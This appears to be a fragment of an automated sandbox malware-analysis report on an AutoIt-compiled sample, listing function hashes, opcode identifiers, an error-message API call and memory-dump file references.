                                                                                          • API String ID: 529655941-2988720461
                                                                                          • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                          • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                                                                          • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                          • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                                                                                          Function 00439514 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                                                                                            • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message_doexit
                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                          • API String ID: 1993061046-4017498283
                                                                                          • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                          • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                                                                          • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                          • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E